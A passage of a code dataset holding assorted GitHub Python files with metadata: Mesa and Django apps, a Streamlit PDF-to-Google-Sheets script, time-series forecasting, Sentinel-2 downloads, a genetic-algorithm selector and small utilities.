portrayal[\"scale\"] = 0.9\n portrayal[\"Layer\"] = 1\n\n\n elif type(agent) is FirstAidRobot:\n portrayal[\"Shape\"] = \"rescue_robots/resources/terrain.png\"\n portrayal[\"scale\"] = 0.9\n portrayal[\"Layer\"] = 2\n portrayal[\"text\"] = round(agent.battery_level, 1)\n portrayal[\"text_color\"] = \"White\"\n\n elif type(agent) is Patient:\n if agent.not_critical_patient:\n portrayal[\"Shape\"] = \"rescue_robots/resources/person.png\"\n else:\n portrayal[\"Shape\"] = \"rescue_robots/resources/personcritical.png\"\n portrayal[\"scale\"] = 0.9\n portrayal[\"Layer\"] = 0\n \n return portrayal\n\n\ncanvas_element = mesa.visualization.CanvasGrid(rescue_robot_portrayal, 20, 20, 500, 500)\nchart_element = mesa.visualization.ChartModule(\n [\n {\"Label\": \"FirstAid Terrain Robots\", \"Color\": \"#AA0000\"},\n {\"Label\": \"Explorer Drones\", \"Color\": \"#666666\"},\n {\"Label\": \"Patients\", \"Color\": \"#00AA00\"},\n ],\n data_collector_name='datacollector'\n)\n\nmodel_params = {\n # The following line is an example to showcase StaticText.\n \"title\": mesa.visualization.StaticText(\"Parameters:\"),\n \"bad_health_status\": mesa.visualization.Checkbox(\"Patient are in bad status\", True),\n \"initial_explorer_drones\": mesa.visualization.Slider(\"Initial Number of Explorer Drones\", 3, 0, 20),\n \"initial_firstaid_robots\": mesa.visualization.Slider(\"Initial Number of FirstAid Robots\", 3, 0, 20),\n \"initial_patients\": mesa.visualization.Slider(\n \"Initial Number of Patients\", 3,0,10\n ),\n \n}\n\nserver = mesa.visualization.ModularServer(\n RescueRobots, [canvas_element, chart_element], \"Mount Green Rescue Mission\", model_params\n)\nserver.port = 8521\n","repo_name":"eotobi/rescue-robots-simulation","sub_path":"rescue_robots/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4012513414","text":"from django import forms\n\nclass ContactForm(forms.Form):\n from_email = forms.EmailField(required=True,widget=forms.EmailInput(attrs={\n 'class':'form-control stext-111 cl2 plh3 size-116 p-l-62 p-r-30',\n 'placeholder':'Your Email',\n }))\n message = forms.CharField(widget=forms.Textarea(attrs={\n 'class':'form-control stext-111 cl2 plh3 size-120 p-lr-28 p-tb-25',\n 'placeholder':'How Can We Help?',\n }), required=True)\n","repo_name":"dat26061994/djangoProject","sub_path":"contact/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17240553536","text":"import streamlit as st\nimport streamlit.components.v1 as stc\nimport pandas as pd\nimport docx2txt\nfrom PyPDF2 import PdfFileReader\nimport re\nimport gspread\nimport df2gspread as d2g\n\ndef read_pdf(file):\n pdfReader = PdfFileReader(file) #reads pdf\n count = pdfReader.numPages #counts the number of pages\n content = \" \"#space holder for pdf content\n for i in range(count): #for loop to extract text from all pages\n page = pdfReader.getPage(i) #gets page numbers\n content += page.extractText() #extracts text from iterated pages\n \n return content\n\ndef main():\n st.title(\"Pending Case Report\")\n\n#uploads pdf\npdf_file = st.file_uploader('Upload pdf', type = 'pdf')\n\nif pdf_file is not None:\n read_pdf(pdf_file)\n\nif __name__ == '__main__':\n\tmain()\n\npdf_raw_text = read_pdf(pdf_file) \n#regex to find cause numbers\nfinds_cause_numbers = re.findall(r'\\d{2}-\\d{2}-\\d{5}-\\w*', pdf_file)\n#puts the cause numbers into a dataframe with the column name 'cause_number'\npending_cause_number_df = pd.DataFrame(finds_cause_numbers, columns = ['cause_number'])\n\n#opens the google sheet of pending case notes\n #sets the json to service account path\njson_path = gspread.service_account(filename = '/Users/hector/codeup-data-science/293pending_cases/pending_cases.json')\n #opens the google sheet by key found in the address\nopens_civil_pending_gs = json_path.open_by_key('1b3fmZrbfwZWMvu4kUGJSSGsp61utlE0Ny-ebozZ5aBk')\n #pulls the data from the google worksheet (civil_pending_notes tab)\ncivil_pending_notes_tab = opens_civil_pending_gs.get_worksheet(0)\n #puts the data from the google sheet and puts it into a dataframe\ncivil_pending_notes = pd.DataFrame(civil_pending_notes_tab.get_all_records())\n\n#adds both lists together in order to search for dups later\ndf = civil_pending_notes.append(pd.DataFrame(pending_cause_number_df, columns=['cause_number']), ignore_index=True)\n #drops the duplicated cause numbers and reindexes the dataframe\n #resets the index and drops the output index\n #fills in the na with an empty space to avoid error\ndf = df.drop_duplicates('cause_number').reset_index(drop=True).fillna(' ')\n\n#Clears the google spreadsheet for the update\ncivil_pending_notes_tab.clear()\n#updates the google sheet with the new list of pending cases\ncivil_pending_notes_tab.update([df.columns.values.tolist()] + df.values.tolist())\n","repo_name":"hrodjr/293pending_cases","sub_path":"pending_cases.py","file_name":"pending_cases.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"249878603","text":"import pandas as pd\nimport os\nimport json \n#import MASTERFILE.Limpia_Data as LIMPIA\n#import MASTERFILE.Analisis as Reporte\n#import MASTERFILE.CountFunctions as CountFunctions\n\n''' ~~ FILL INFORMATION BELOW THIS LINE ~~ '''\nbrands = [\"ChefPremier\", \"Mooch App\", \"7enequilibrio\"] #Correr antes el Genera Base Twitter\nfor brand in brands:\n folder_name = brand\n\n with open(r\"Data/%s/Competencia.json\"%brand) as f:\n competencia = json.load(f)\n\n\n with open(r\"Data/%s/crecimiento_estatal.json\"%brand) as f:\n crecimiento = json.load(f)\n\n with open(r\"RESULTADOS/%s/JSON/SentimientoProm_Region.json\"%brand) as f:\n sentimiento = json.load(f)\n\n\n Regiones = competencia.keys()\n Regiones\n mapa={}\n for region in Regiones:\n if region == \"Sureste\":\n mapa[\"SurEste\"]={\n 'Sentiment': sentimiento[\"SurEste\"][\"Sentiment\"],\n 'Competencia': competencia[region],\n 'Crecimiento': crecimiento [region]\n }\n else:\n mapa[region]={\n 'Sentiment': sentimiento[region][\"Sentiment\"],\n 'Competencia': competencia[region],\n 'Crecimiento': crecimiento [region]\n }\n\n with open (r\"RESULTADOS\\%s\\JSON\\MapaCompetencia.json\"%brand, 'w') as file:\n json.dump( mapa ,file)\n","repo_name":"jcarvargtz/twitter_marcas_master","sub_path":"MASTERFILE/Genera_Mapa_Competencia.py","file_name":"Genera_Mapa_Competencia.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2112098444","text":"import numpy as np\nimport myfitrw_092018 as mfr\nimport mylcgen as mlcg\nimport matplotlib.pylab as plt\n\nimport statsmodels.api as sm \nfrom statsmodels.tsa.stattools import acf \nfrom statsmodels.tsa.stattools import pacf\nfrom statsmodels.tsa.seasonal import seasonal_decompose\n\ntlen = 3000.0\ndt = 1.0\n\n#enter period of long time-scale variations\nperiod = [365.0,180.0]\ncolor= ['r','b']\n\n#amplitude relative to standard deviation of random time series\namp_p = [0.1,0.1]\n\n#generate fake data with a large amplitude period\n\n\n\n#first generate the random-ness\ndat = mlcg.mylcgen(datfile='',p0=1.0,f0=0.1,a=-2,b=-2,tlo=0,thi=tlen,dt=dt,ploton=0,iseed=-1,meannorm = -1., sdnorm = -1.0)\nnd = np.shape(dat[:,0])[0]\n\n\nstd = np.std(dat[:,1])\n#now modulate with a large (annual) like the bike hire data\nvariation = np.zeros(nd)\nfor ipn in range(len(period)):\n variation = variation + amp_p[ipn]*std*np.sin(2*np.pi/period[ipn] * dat[:,0])\n\n\n\n#add on the periodic variability\ndat[:,1] = dat[:,1] + variation\n\n\n\n\n#compute the fourier transform\nft = np.fft.fft(dat[:,1])\nfreq = np.fft.fftfreq(nd)\nps = np.abs(ft)**2\n\n\n\n\n#plot the result\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax1.plot(dat[:,0],dat[:,1],marker='o',ls=None)\nax1.set_xlabel('Time (days)')\nax1.set_ylabel('Time Series')\n\nyl = list(ax1.get_ylim())\n\nipn = 0\nfor pnow in period:\n tnow = pnow/4\n idp = 0\n while (tnow < dat[-1,0]):\n if (idp == 0):\n ax1.plot([tnow]*2,yl,ls='--',color=color[ipn],label='synthetic period '+np.str(pnow)+' days')\n else:\n ax1.plot([tnow]*2,yl,ls='--',color=color[ipn])\n tnow = tnow + pnow\n idp = idp + 1\n ipn = ipn + 1\nplt.legend()\nplt.savefig('test_data_diagnose.pdf')\n\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax1.plot(freq,ps,marker='o',ls=None)\nax1.set_xlabel('frequency (cycles/day)')\nax1.set_ylabel('P(f)')\nax1.set_xscale('log')\nax1.set_yscale('log')\nyl = list(ax1.get_ylim())\nfor ipn in range(len(period)):\n ax1.plot([1./period[ipn]]*2,yl,ls='--',color=color[ipn],label='synthetic period '+np.str(period[ipn])+' days')\nplt.legend()\nplt.savefig('test_pspec_diagnose.pdf')\n\n\n\n\n\n\n\n\n#mfr.fitrw([dat[:,0]],[dat[:,1]],[np.ones(nd)],floin=-1,fhiin=-1,plot_tit='fig_myrwfit',dtresin=-1,nits = 1,tplotlims=[],extra_f=[],\n#p0=-1,bpl = [0.5,2,2],messages=0)\n\nfrom statsmodels.tsa.seasonal import seasonal_decompose\ndecomposition = seasonal_decompose(dat[:,1], freq=10) \ntrend = decomposition.trend\nseasonal = decomposition.seasonal\nres = decomposition.resid\nfig = plt.figure() \nfig = decomposition.plot() \nfig.set_size_inches(15, 8)\nplt.savefig('arima.pdf')\n\n\n\n\nstartforecast = 2600\nendforecast = 3000\n\nmod = sm.tsa.statespace.SARIMAX(dat[:startforecast,1], trend='n', order=(0,1,0), seasonal_order=(1,1,1,12))\nresults = mod.fit()\n\nplt.clf()\nfig = plt.figure()\nax1 = fig.add_subplot(111)\n#get condfidence limits\npred = results.get_prediction(start = startforecast, end= endforecast)\nps = pred.summary_frame()\npslo = np.array(ps['mean_ci_lower'])\npshi = np.array(ps['mean_ci_upper'])\npst = np.arange(startforecast,endforecast+1)\npsmean = np.array(ps['mean'])\nax1.plot(pst,psmean)\nax1.plot(dat[:startforecast,0],dat[:startforecast,1])\n\nax1.fill_between(pst,pslo,pshi,alpha=0.2)\n\nax1.plot(dat[startforecast:,0],dat[startforecast:,1],ls='--',color='k')\n\nplt.savefig('forecast.pdf')\n\n\n\n\nparmout,covout,freq,tplot,xplot,xplotsd,p0_out,w0,dw,sig2_prior=mfr.fitrw([dat[:startforecast,0]],[dat[:startforecast,1]],[0.95],\nfloin=1./6000,fhiin=1.0,plot_tit='fig_myrwfit',dtresin=dat[:,0],nits = 100,tplotlims=[],extra_f=[1./365,1./180.],p0=-1,bpl = [0.5,2,2])\n#mod = sm.tsa.statespace.SARIMAX(df.riders, trend='n', order=(0,1,0), seasonal_order=(1,1,1,12))\n#results = mod.fit()\n#print results.summary()\n\n#this is a good tutorial follow for timeseries forecasting\n#https://towardsdatascience.com/an-end-to-end-project-on-time-series-analysis-and-forecasting-with-python-4835e6bf050b\n\n\n\n#compare the seasonal arima and \n\n\n\n","repo_name":"drds1/projects","sub_path":"seasonal_arima/code_dir/test_drwmod.py","file_name":"test_drwmod.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18356325097","text":"from DateTime import DateTime\nfrom ftw.upgrade import ProgressLogger\nfrom ftw.upgrade import UpgradeStep\nfrom zope.annotation import IAnnotations\n\n\nANN_KEY = 'ftw.file-upgrade-1500-migrated-data'\n\n\nclass AddDocumentDateIndex(UpgradeStep):\n\n def __call__(self):\n self.setup_install_profile('profile-ftw.file.upgrades:1500')\n if not self.catalog_has_index('documentDate'):\n self.catalog_add_index('documentDate', 'DateIndex')\n self.migrate_dates()\n self.catalog_reindex_objects({'portal_type': 'File'},\n idxs=['effective', 'documentDate'])\n\n def migrate_dates(self):\n objects = self.catalog_unrestricted_search({'portal_type': 'File'},\n full_objects=True)\n\n with ProgressLogger('Migrate file dates', objects) as step:\n for obj in objects:\n ann = IAnnotations(obj)\n if ann.get(ANN_KEY, None) is not None:\n step()\n continue\n\n ann[ANN_KEY] = True\n\n newdate = obj.getEffectiveDate()\n if not newdate:\n newdate = obj.created()\n obj.setDocumentDate(newdate)\n obj.setEffectiveDate(DateTime())\n step()\n","repo_name":"4teamwork/ftw.file","sub_path":"ftw/file/upgrades/to_1500.py","file_name":"to_1500.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40925196450","text":"from flask import Flask\nfrom flask_user import SQLAlchemyAdapter, UserManager\n\nfrom cfg import logconf\nfrom db_config import db_create, db_create_tables, db_delete\nfrom init_db import create_default_entries_in_db\nfrom models import users\n\n\ndef user_config():\n db = SharedState().getInstance().db\n app = SharedState().getInstance().app\n\n user_manager = UserManager(app, db, users.User)\n SharedState().getInstance().user_mgr = user_manager\n logging.getLogger(__name__).info('Finished Initializing flask_user')\n\nclass FlaskInit(object):\n def __init__(self):\n self.flask_app = Flask(__name__)\n logconf.setup_logger()\n user_config()\n\n def db_setup(self, default_entry_create=True):\n # once we start migrations, we'll not do this\n db_delete()\n db_create()\n db_create_tables(model_module=self.model_module)\n if default_entry_create:\n create_default_entries_in_db()\n\n def get_flask_app(self):\n return self.flask_app\n\n\nflask_init = FlaskInit()\nleitrim_server = flask_init.get_flask_app()\nleitrim_server.run(host='0.0.0.0', port=5002)\n","repo_name":"venunayar/example-web-service","sub_path":"src/mgmt/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9422073830","text":"# # Definition for singly-linked list.\n# # class ListNode:\n# # def __init__(self, x):\n# # self.val = x\n# # self.next = None\n\n# class Solution:\n# def hasCycle(self, head: ListNode) -> bool:\n# tortoise=head\n# hare = head\n# begin=0\n# while( hare is not None and tortoise is not None ):\n# if(tortoise ==hare and begin!=0 ):\n# return True\n# else:\n# if(tortoise.next):\n# tortoise=tortoise.next.next\n# else:\n# tortoise=tortoise.next\n# hare=hare.next\n# begin+=1\n# return \n\n \nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n tortoise=head\n hare = head\n \n while( hare and tortoise and tortoise.next ):\n tortoise=tortoise.next.next\n hare=hare.next\n if(tortoise == hare):\n return True\n return None\n ","repo_name":"rezavai92/leetcode-solution","sub_path":"141. Linked List Cycle/floyd-cycle.py","file_name":"floyd-cycle.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37809103317","text":"import pyglet\r\nimport os\r\nfrom colorama import Fore\r\n\r\nwhile True:\r\n i = os.listdir()\r\n\r\n # удаление по индексу\r\n e = i.index('main.py')\r\n ii = i.pop(e)\r\n\r\n for o in i:\r\n print(Fore.GREEN + o)\r\n\r\n a = input(Fore.BLUE + 'name:')\r\n if a + '.mp3' in i:\r\n index = i.index(a + '.mp3')\r\n\r\n song = pyglet.media.load(i[index])\r\n player = pyglet.media.Player()\r\n player.queue(song)\r\n\r\n # Воспроизведите песню\r\n player.play()\r\n\r\n is_paused = False # Флаг, который показывает, находится ли песня на паузе\r\n\r\n while True:\r\n pause = input('command:')\r\n if pause.lower() == 'yes':\r\n if not is_paused:\r\n player.pause()\r\n is_paused = True\r\n elif pause.lower() == 'no':\r\n if is_paused:\r\n player.play()\r\n is_paused = False\r\n elif pause == 'music':\r\n break\r\n continue\r\n else:\r\n print(Fore.RED + 'Песня не найдена.')\r\n","repo_name":"sharknew1234/mp3","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24739657615","text":"import random\nfrom models.shared_models import *\n\n\nclass Selection:\n\n def __init__(self, amount_of_parents_chosen: int):\n self.total_fitness = 0\n self.amount_of_parents_chosen = amount_of_parents_chosen\n\n def select_best_solutions(self, population_list: List[SolutionGA]):\n self.total_fitness = 0\n self.__create_weighted_wheel(population=population_list)\n parent_list = []\n for i in range(0, self.amount_of_parents_chosen):\n parent_list.append(self.__select_solution_for_parent(population_list=population_list))\n random.shuffle(population_list)\n x = 0\n while len(parent_list) < len(population_list):\n parent_list.append(population_list[x])\n x += 1\n return parent_list\n\n def __create_weighted_wheel(self, population: List[SolutionGA]):\n for solution in population:\n self.total_fitness += solution.fitness\n\n def __select_solution_for_parent(self, population_list: List[SolutionGA]) -> SolutionGA:\n random_float = random.random()\n fitness_left = random_float * self.total_fitness\n for i in population_list:\n if i.fitness >= fitness_left:\n return i\n else:\n fitness_left -= i.fitness\n","repo_name":"mforberg/SDU-THESIS-2021","sub_path":"content_generation/genetic_algorithm/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13846367937","text":"import warnings\n\nimport eocrops.tasks.curve_fitting\n\nwarnings.filterwarnings(\"ignore\")\n\nimport geopandas as gpd\nfrom scipy.signal import savgol_filter\n\nimport os\nimport numpy as np\nimport eocrops\nfrom eocrops.inputs import utils_sh as utils_sh\nfrom eocrops.inputs import sentinel2 as sentinel2\nfrom eocrops.tasks import preprocessing as preprocessing\n\ndir_path = os.path.dirname(os.getcwd())\nprint(dir_path)\n# read microplot data\nshapefile_input = gpd.read_file(\n os.path.join(dir_path, \"eo-crops/examples/layers/POLYGON.shp\")\n)\n\napi = \"\"\nclient_id = \"\"\nclient_secret = \"\"\n\n\nconfig = utils_sh.config_sentinelhub_cred(api, client_id, client_secret)\n# Provide here your planet API key\nconfig.planet_key = \"\"\n\n# %%\n\ntime_period = (\"2020-02-15\", \"2020-08-15\")\nkwargs = dict(polygon=shapefile_input, time_stamp=time_period, config=config)\n\n\nos.getcwd()\nwarnings.filterwarnings(\"ignore\")\npatch = sentinel2.workflow_instructions_S2L2A(\n **kwargs,\n path_out=\"/home/johann/Documents/patch\", # you can specify here a path to save the EOPatch object\n coverage_predicate=0.5,\n interpolation={\"interpolate\": True, \"period_length\": 8}\n)\n\ncurve_fit = eocrops.tasks.curve_fitting.AsymmetricGaussian(range_doy=(100, 365))\nts_mean = curve_fit.get_time_series_profile(\n patch, feature=\"LAI\", feature_mask=\"MASK\"\n).flatten()\nts_mean[:2] = np.nan\n\nvalid_values = np.where(~np.isnan(ts_mean))[0]\nts_mean[: valid_values[0]] = ts_mean[valid_values[0]]\nts_mean[valid_values[-1] :] = ts_mean[valid_values[-1]]\n\nfitted = curve_fit.execute(patch, feature=\"LAI\")\n","repo_name":"j-desloires/eo-crops","sub_path":"examples/dev_test/data_download.py","file_name":"data_download.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"16240204412","text":"class Solution:\n # @param A : tuple of integers\n # @return a list of integers\n def solve(self, A):\n rev = []\n for i in range (len(A)-1,-1,-1):\n rev.append(A[i])\n \n return rev\n\n\n\nobj = Solution()\ntest = (1,2,3,4,5)\nprint(obj.solve(test))","repo_name":"aman-bcalm/Scaler-Problems","sub_path":"Primer/reverseArray.py","file_name":"reverseArray.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1155284183","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.signal import fftconvolve\n\nfrom blend import composite_paper\nfrom edge import get_edge_img\nfrom multi_res import get_mr_img_from_rgb_img\nfrom stroke import get_stroke_img\nfrom utilities import show_img\nfrom multi_res_lic import get_mrl\nimport sys \nargumentList = sys.argv \n \n# Print the usage instructions\nif len(sys.argv) != 2:\n print(\"USAGE: python3 final.py image-path\")\n exit(0)\n\nimg_path = sys.argv[1]\n# print(img_path)\nimg = cv2.imread(img_path)\nbg_img = cv2.imread(\"paper.jpg\")\n\nif img.shape[0] < 257 or img.shape[1] < 257:\n img = cv2.resize(img, (300, 300))\n\nif img_path == \"../images/castle.jpeg\":\n print(img.shape)\n img = cv2.resize(img, None, fx=2.0, fy=2.0)\n\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\nmr_img = get_mr_img_from_rgb_img(img)\n_, _, edge_img = get_edge_img(mr_img, thresh=110, thresh2=0.1)\nmrl_img = get_mrl(img)\nstrk_img = get_stroke_img(edge_img, mrl_img)\nout = composite_paper(strk_img, bg_img,0.4)\n\nedge_img = edge_img.astype(np.uint8)\nshow_img(img, splt=321,gray=False, title=\"Input\")\nshow_img(edge_img, splt=322, title=\"Edge Image\")\nshow_img(mrl_img, splt=323, title=\"Multi-resolution LIC Image\")\nshow_img(strk_img, splt=324, title=\"Stroke Image\")\nshow_img(out, splt=325, title=\"Output\")\nplt.show()\nplt.figure()\nplt.suptitle(\"Final Output\")\nshow_img(img, splt=121, title=\"Input\")\nshow_img(out, splt=122, title=\"Output\")\nplt.show()\nplt.figure()\nfor ind, i in enumerate(range(3,9)):\n out = composite_paper(strk_img, bg_img, alpha=i/10)\n show_img(out, splt=321+ind)\nplt.show()","repo_name":"surendra1233/automated_pencil_drawing","sub_path":"src/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6136281962","text":"import tkinter as tk\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk\nfrom PIL import Image\n\nclass Plotter:\n def __init__(self):\n self.fig = plt.Figure(figsize=(6, 4), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.points = []\n\n def plot_data(self, event):\n # Get the coordinates of the clicked point\n x = event.xdata\n y = event.ydata\n\n if x is not None and y is not None:\n # Get the current marker\n marker = self.marker_var.get()\n\n # Plot the clicked point with the current marker and the same color\n self.ax.plot(x, y, marker=marker, color='lime')\n self.points.append((x, y, marker))\n self.canvas.draw()\n\n def clear_plot(self):\n # Clear the current plot\n self.ax.clear()\n self.points = [] # Reset the points\n self.canvas.draw()\n\n def create_gui(self):\n # Create a Tkinter window\n window = tk.Tk()\n window.title(\"Matplotlib Graph in Tkinter\")\n\n # Load and resize the image background\n img = plt.imread(r\"C:\\Users\\vihaa\\FTC-Autonomous-Planner\\FTC_Auto_Planner\\MatPlotLibTests\\background.jpg\")\n\n # Set the image as the background\n self.ax.imshow(img, extent=[-10, 10, -10, 10])\n\n # Create a canvas widget to display the graph\n self.canvas = FigureCanvasTkAgg(self.fig, master=window)\n self.canvas.draw()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n # Create a toolbar for the graph\n toolbar = NavigationToolbar2Tk(self.canvas, window)\n toolbar.update()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n # Create buttons to interact with the plot\n self.marker_var = tk.StringVar()\n self.marker_var.set('o') # Default marker\n\n circle_button = tk.Radiobutton(window, text=\"Circle\", variable=self.marker_var, value='o')\n circle_button.pack(side=tk.LEFT, padx=10)\n\n square_button = tk.Radiobutton(window, text=\"Square\", variable=self.marker_var, value='s')\n square_button.pack(side=tk.LEFT, padx=10)\n\n triangle_button = tk.Radiobutton(window, text=\"Triangle\", variable=self.marker_var, value='^')\n triangle_button.pack(side=tk.LEFT, padx=10)\n\n clear_button = tk.Button(window, text=\"Clear\", command=self.clear_plot)\n clear_button.pack(side=tk.LEFT, padx=10)\n\n # Bind the plot_data function to mouse clicks on the canvas\n self.canvas.mpl_connect('button_press_event', self.plot_data)\n\n # Run the Tkinter event loop\n window.mainloop()\n\n\n# Create an instance of the Plotter class and run the GUI\nplotter = Plotter()\nplotter.create_gui()\n","repo_name":"VihaanChhabria/Python-Examples","sub_path":"TkinterTests/TkinterMatplotlibP2.py","file_name":"TkinterMatplotlibP2.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6773039931","text":"import numpy as np\n\n# way faster than np.random.choice\n# arr is an array of probabilities, should sum to 1\ndef sample(arr):\n r = np.random.rand()\n s = 0\n for i, p in enumerate(arr):\n s += p\n if s > r or s == 1:\n return i\n\n # worst case if we run into floating point error, just return the last element\n # we should never get here\n return len(arr) - 1\n\n# faster than np.random.choice\ndef choice(arr, size = None):\n ind = np.random.randint(0, len(arr), size=size)\n return np.array(arr)[ind]\n\ndef argmax(arr):\n ties = []\n top = -np.inf\n for i, a in enumerate(arr):\n if a > top:\n top = a\n ties = [i]\n elif a == top:\n ties.append(i)\n\n return choice(ties)","repo_name":"andnp/SoftmaxPolicies","sub_path":"src/utils/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8247463811","text":"import pyautogui\nfrom time import sleep\n\n\n\npyautogui.click(920,869,duration=1.5) \npyautogui.write('Marco',duration=2)\n\n#open file \n\nwith open('produtos.txt', 'r') as file:\n for line in file:\n line.split(',')[0]\n product = line.split(',')[1]\n unit = line.split(',')[2]\n price = line.split(',')[3]\n\n #click and edit product\n pyautogui.click(259,298,duration=2)\n pyautogui.write(product)\n\n #click and edit unit\n pyautogui.click(259,298,duration=2)\n pyautogui.write(unit)\n\n #click and edit price\n pyautogui.click(259,298,duration=2)\n pyautogui.write(price)\n\n #button register\n pyautogui.click(907,231,duration=2)\n sleep(1)","repo_name":"marcotorquato/python","sub_path":"EasyProjects/geoclick/automat-geoclick.py","file_name":"automat-geoclick.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23288375537","text":"from django.db import models\nfrom django.contrib.auth.models import User\nclass Customer(models.Model):\n \"\"\"\n This makes a customer instance\n Author:\n Trey Suiter\n \"\"\"\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n address = models.CharField(max_length=100, null=True)\n city = models.CharField(max_length=50, null=True)\n zipcode = models.CharField(max_length=7, null=True)\n phone = models.CharField(max_length=14, null=True)\n\n class Meta:\n verbose_name = (\"customer\")\n verbose_name_plural = (\"customers\")\n def __str__(self):\n return f'{self.user.first_name} {self.user.last_name}'\n \n#!This is not needed due to using ORM\n# These receiver hooks allow you to continue to\n# work with the `User` class in your Python code.\n# Every time a `User` is created, a matching `Customer`\n# object will be created and attached as a one-to-one\n# property\n# @receiver(post_save, sender=User)\n# def create_customer(sender, instance, created, **kwargs):\n# if created:\n# Customer.objects.create(user=instance)\n# # Every time a `User` is saved, its matching `Customer`\n# # object will be saved.\n# @receiver(post_save, sender=User)\n# def save_customer(sender, instance, **kwargs):\n# instance.customer.save() ","repo_name":"nss-cohort-36/bangazon-api-imagination-station-api","sub_path":"bangazonapi/models/customers.py","file_name":"customers.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13737124351","text":"from django.shortcuts import render, get_object_or_404, render_to_response, redirect\nfrom .models import Category, Product, Author, News\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import AuthorForm\nfrom django.conf import settings\nfrom .models import Comments\nfrom .forms import CommentForm\n\n\n\n@login_required(redirect_field_name=settings.LOGIN_URL)\ndef cabinet(request):\n ctx = {}\n ctx['cabinet_tab'] = 'main'\n if request.method == 'GET':\n try:\n author = Author.objects.get(user=request.user.id)\n ctx['form'] = AuthorForm(instance=author)\n except Exception as e:\n ctx['form'] = AuthorForm\n elif request.method == 'POST':\n form = AuthorForm(request.POST)\n if form.is_valid():\n author = Author.objects.get(user=request.user.id)\n author.date_birth = form.cleaned_data['date_birth']\n author.bio = form.cleaned_data['information']\n author.type_view = form.cleaned_data['type_view']\n author.pseudoname = form.cleaned_data['cleaned_data']\n author.save()\n ctx['save'] = True\n ctx['form'] = AuthorForm(instance=author)\n else:\n ctx['form'] = AuthorForm(request.POST)\n return render(request, 'forum/forum/cabinet.html', ctx)\n\n\n# Страница с товарами\ndef ProductList(request, category_slug=None):\n category = None\n categories = Category.objects.all()\n products = Product.objects.filter(available=True)\n if category_slug:\n category = get_object_or_404(Category, slug=category_slug)\n products = products.filter(category=category)\n return render(request, 'forum/product/list.html', {\n 'category': category,\n 'categories': categories,\n 'products': products\n })\n\n\n# Страница товара\ndef ProductDetail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n return render(request, 'forum/product/detail.html',\n {'product': product,\n })\n\n\ndef index(request):\n all_books = Product.objects.all() # 'SELECT * FROM wa_1_book;'\n return render(request, 'index.html', {})\n\ndef news_list(request):\n \"\"\"Вывод всех новостей\n \"\"\"\n news = News.objects.all()\n return render(request, \"forum/forum/list.html\", {\"news\": news})\n\n\ndef new_single(request, pk):\n \"\"\"Вывод полной статьи\n \"\"\"\n new = get_object_or_404(News, id=pk)\n comment = Comments.objects.filter(new=pk, moderation=True)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n form = form.save(commit=False)\n form.user = request.user\n form.new = new\n form.save()\n return redirect(new_single, pk)\n else:\n form = CommentForm()\n return render(request, \"forum/forum/new_single.html\",\n {\"new\": new,\n \"comments\": comment,\n \"form\": 